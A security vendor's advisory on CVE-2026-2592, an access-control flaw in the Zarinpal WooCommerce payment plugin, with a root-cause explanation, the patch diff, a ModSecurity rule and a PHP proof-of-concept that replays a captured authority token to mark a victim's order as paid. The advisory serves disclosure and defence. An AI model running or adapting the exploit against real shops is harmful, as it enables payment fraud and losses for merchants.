Atomic Edge analysis of CVE-2026-2592:
This vulnerability is an improper access control flaw in the Zarinpal Gateway for WooCommerce WordPress plugin, versions up to and including 5.0.16. The flaw allows unauthenticated attackers to manipulate the payment status of WooCommerce orders, potentially marking them as paid without a valid transaction. The CVSS score of 7.7 reflects a high-severity integrity and availability impact.
Atomic Edge research identifies the root cause in the `Return_from_ZarinPal_Gateway` callback handler within the file `zarinpal-woocommerce-payment-gateway/class-wc-gateway-zarinpal.php`. The vulnerable code, prior to line 384, processes the callback by checking the `Status` and `Authority` GET parameters. The handler fails to verify that the provided `Authority` token is specifically associated with the order ID also present in the request. This missing validation allows an authority token from one transaction to be replayed against a different order of the same amount.
The exploitation method involves an unauthenticated attacker intercepting or predicting a valid `Authority` token from a legitimate payment flow. The attacker then crafts a request to the plugin’s public callback endpoint, typically triggered by a user return from the gateway, with the target order ID and the stolen authority token. The attack vector is a GET request containing the parameters `Status=OK` and `Authority={stolen_token}`. The order ID is likely passed via the `order_id` parameter or derived from the session, as the callback handler retrieves the order object without verifying token ownership.
The patch in version 5.0.17 introduces a multi-step validation mechanism. The fix adds logic to store a history of authority tokens for each order in a new `_zarinpal_authority_history` meta field. During callback processing, the code now checks if the submitted `Authority` value matches either the current `_zarinpal_authority` meta value or any value in the stored history array. If no match is found, the request is rejected, an error note is added to the order, and the user is redirected. This ensures the authority token is bound to the specific order instance.
Successful exploitation directly impacts store revenue and order fulfillment integrity. Attackers can cause financial loss by marking arbitrary orders as ‘paid’ without an actual funds transfer. This can lead to goods or services being dispatched without payment, inventory discrepancies, and administrative confusion. The attack requires no authentication and can be performed remotely, making it a significant business logic flaw.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/zarinpal-woocommerce-payment-gateway/class-wc-gateway-zarinpal.php
+++ b/zarinpal-woocommerce-payment-gateway/class-wc-gateway-zarinpal.php
@@ -356,7 +356,15 @@
$cart_json,
$referrer_id
);
+
$order->update_meta_data('_zarinpal_authority', $authority);
+ $authority_history = $order->get_meta('_zarinpal_authority_history');
+ if (!is_array($authority_history)) {
+ $authority_history = array();
+ }
+ $authority_history[] = $authority;
+ $order->update_meta_data('_zarinpal_authority_history', $authority_history);
+
$order->save();
$note = sprintf(__('کاربر به درگاه پرداخت هدایت شد. شناسه تراکنش: %s', WC_ZPAL_TEXT_DOMAIN), $authority);
$order->add_order_note($note);
@@ -376,9 +384,33 @@
wp_redirect(wc_get_checkout_url());
exit;
}
+
+ if ($order->is_paid()) {
+ wp_redirect($this->get_return_url($order));
+ exit;
+ }
+
if (isset($_GET['Status']) && $_GET['Status'] === 'OK') {
$authority = sanitize_text_field($_GET['Authority']);
-
+ $stored_authority = $order->get_meta('_zarinpal_authority');
+ $authority_history = $order->get_meta('_zarinpal_authority_history');
+ $is_valid_authority = false;
+
+ if (!empty($stored_authority) && $authority === $stored_authority) {
+ $is_valid_authority = true;
+ }
+
+ if (!$is_valid_authority && is_array($authority_history) && in_array($authority, $authority_history, true)) {
+ $is_valid_authority = true;
+ }
+
+ if (!$is_valid_authority) {
+ $order->add_order_note(__('تلاش برای پرداخت با توکن نامعتبر. توکن ارسالی با توکن سفارش مطابقت ندارد.', WC_ZPAL_TEXT_DOMAIN));
+ wc_add_notice(__('توکن پرداخت نامعتبر است. لطفاً مجدداً تلاش کنید.', WC_ZPAL_TEXT_DOMAIN), 'error');
+ wp_redirect(wc_get_checkout_url());
+ exit;
+ }
+
$order_total = $order->get_total();
$amount = intval($order_total);
$currency = $order->get_currency();
--- a/zarinpal-woocommerce-payment-gateway/index.php
+++ b/zarinpal-woocommerce-payment-gateway/index.php
@@ -1,7 +1,7 @@
<?php
/*
Plugin Name: افزونه پرداخت امن زرینپال برای ووکامرس
-Version: 5.0.16
+Version: 5.0.17
Description: افزونه درگاه پرداخت امن زرینپال برای فروشگاه ساز ووکامرس
Plugin URI: https://zarinpal.com
Author: Masoud Amini, Armin Zahedi
@@ -9,7 +9,7 @@
Text Domain: wc-zpal
Domain Path: /languages
WC requires at least: 3.0
-WC tested up to: 9.4.1
+WC tested up to: 9.5
Requires at least: 5.8
Tested up to: 6.7.1
License: GPLv3 or later
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-2592
# This rule blocks exploitation of the improper access control in the Zarinpal Gateway callback.
# It matches the specific vulnerable endpoint and the attack pattern of reusing an authority token.
SecRule REQUEST_URI "@rx ?wc-api=WC_Gateway_Zarinpal"
"id:10002592,phase:2,deny,status:403,chain,msg:'CVE-2026-2592 Exploit Attempt: Zarinpal Gateway Improper Access Control',severity:'CRITICAL',tag:'CVE-2026-2592',tag:'WooCommerce',tag:'Plugin-Zarinpal'"
SecRule ARGS_GET:Status "@streq OK" "chain"
SecRule ARGS_GET:Authority "@rx ^[A-Za-z0-9]{32}$"
"setvar:'tx.cve_2026_2592_authority=%{matched_var}',chain"
SecRule &ARGS_GET:order_id "!@eq 0"
"t:none,setvar:'tx.cve_2026_2592_detected=1'"
# Note: This rule triggers on the presence of the specific callback endpoint with a valid-looking authority token and an order_id.
# Legitimate traffic will also match this pattern, but the patch ensures server-side validation of token ownership.
# Therefore, deploying this rule on an unpatched system will block the exploit, but may also block some legitimate callbacks if the token validation fails for other reasons (e.g., user retrying with an expired token).
# A more precise virtual patch is not possible without inspecting server-side order-token binding, which the WAF cannot do.
# For this reason, the rule is provided but administrators should prioritize applying the official plugin update.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2592 - Zarinpal Gateway for WooCommerce <= 5.0.16 - Improper Access Control to Payment Status Update
<?php
// CONFIGURATION
$target_url = 'https://victim-site.com/'; // Base URL of the target WordPress site
$stolen_authority = 'A0000000000000000000000000000000'; // Valid authority token captured from a different transaction
$target_order_id = 123; // The order ID the attacker wants to mark as paid
// The callback endpoint is typically accessed when a user returns from the gateway.
// The exact URL pattern may vary; common patterns include the checkout page or a specific endpoint.
// This PoC assumes the order ID is passed via a GET parameter, as is common in WooCommerce payment returns.
$callback_url = $target_url . '?wc-api=WC_Gateway_Zarinpal&order_id=' . $target_order_id . '&Status=OK&Authority=' . urlencode($stolen_authority);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $callback_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects to see final response
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
// Execute the request to trigger the vulnerable callback handler
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_coden";
echo "Response Body (first 500 chars):n" . substr($response, 0, 500) . "n";
// A successful exploit may redirect to a 'thank you' page or show an order confirmation.
// In the vulnerable version, the order status would be updated to 'processing' or 'completed'.
?>
